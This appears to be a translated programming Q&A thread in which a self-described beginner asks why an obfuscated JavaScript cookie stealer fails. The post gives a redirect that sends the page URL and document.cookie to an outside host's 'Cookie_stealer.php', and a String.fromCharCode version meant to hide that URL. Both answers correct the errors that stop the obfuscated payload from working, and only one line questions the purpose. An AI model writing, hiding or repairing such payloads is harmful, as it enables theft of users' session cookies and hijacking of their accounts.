Javascript string.fromcharcode

时间:2013-07-06 22:45:56

标签: javascript string

我是javascript和编程的新手。

这是原始代码:

document.location = "http://ormteam.net23.net/Cookie_stealer.php?url=" + window.location.href + "&cookies=" + document.cookie;

这是使用string.fromcharcode

document.location = String.fromCharCode(34, 104, 116, 116, 112, 58, 47, 47, 111, 114, 109, 116, 101, 97, 109, 46, 110, 101, 116, 50, 51, 46, 110, 101, 116, 47, 67, 111, 111, 107, 105, 101, 95, 115, 116, 101, 97, 108, 101, 114, 46, 112, 104, 112, 63, 117, 114, 108, 61, 34) + document.url + String.fromCharCode(34, 38, 99, 111, 111, 107, 105, 101, 115, 61, 34) + document.cookies;

为什么这不起作用?

坐在这个代码的安宁上几个小时! ; //

2 个答案:

答案 0 :(得分:4)

仅在字符串文字中需要引号。由于您没有使用字符串文字,因此不需要引号。

document.location = String.fromCharCode(104, 116, 116, 112, ...

答案 1 :(得分:2)

从这些字符代码中移除34,因为它们适用于"

document.cookies设为document.cookie

如果你是javascript的新手,你在使用cookie窃取器做什么,只是好奇!